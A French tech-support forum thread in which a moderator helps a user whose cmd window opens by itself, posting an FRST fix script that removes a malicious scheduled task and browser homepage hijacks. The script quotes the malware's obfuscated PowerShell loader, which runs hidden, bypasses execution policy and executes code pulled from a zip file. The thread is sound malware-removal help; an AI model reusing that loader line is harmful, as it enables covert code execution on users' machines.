Fenêtre cmd qui s'ouvre toute seule

Résolu
Vivien -  
bazfile Messages postés 58600 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour,


j'ai une fenêtre cmd qui s'ouvre toute seule (le plus souvent quand je joue a League of légend)

J'ai réalisé un scan FRST mais je ne sais pas à qui envoyer les liens qui me sont envoyés par le site Malekal's forum.
Je n'y connais rien en informatique mais je pense être infectée.

Pouvez vous m'aider s'il vous plait?


https://pjjoint.malekal.com/files.php?id=20200818_h10c13o10g10o7


https://pjjoint.malekal.com/files.php?id=20200818_t10q6y9f8o8


https://pjjoint.malekal.com/files.php?id=20200818_y6k9h13l6g7
A voir également:

5 réponses

bazfile Messages postés 58600 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 798
 
Bonjour,
Les rapports sont vides il faut attendre les messages disant que l'analyse est terminée avant de les envoyer, recommence.
0
bazfile Messages postés 58600 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 798
 
Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
GroupPolicy: Restriction ?
GroupPolicy\User: Restriction ?
Task: {BFDF2038-BF5E-448F-94BE-F4BF74A9CA01} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier
Task: {F6E6CD9F-D42A-4DD0-986F-2BA77DBB4056} - System32\Tasks\AI => C:\WINDOWS\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{c:\users $v=dir -force -r -in fac*.zip|select -last 1;$j=gc -LiteralPat $v.fullname;$j[$j.length-1]|iex}"
FF HomepageOverride: Mozilla\Firefox\Profiles\deg58the.default -> Enabled: homepage@mail.ru
CHR HomePage: Default -> hxxp://mail.ru/cnt/10445?gp=834423
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=834423"
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise Google Chrome https://support.google.com/chrome/answer/3296214?hl=fr

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

.
0
bazfile Messages postés 58600 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 798
 
Le fixlog est bon, c'est mieux ?
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Vivien
 
c bon merci beaucoup il y a plus rien
0
bazfile Messages postés 58600 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 798
 
OK, je met le sujet en résolu.
0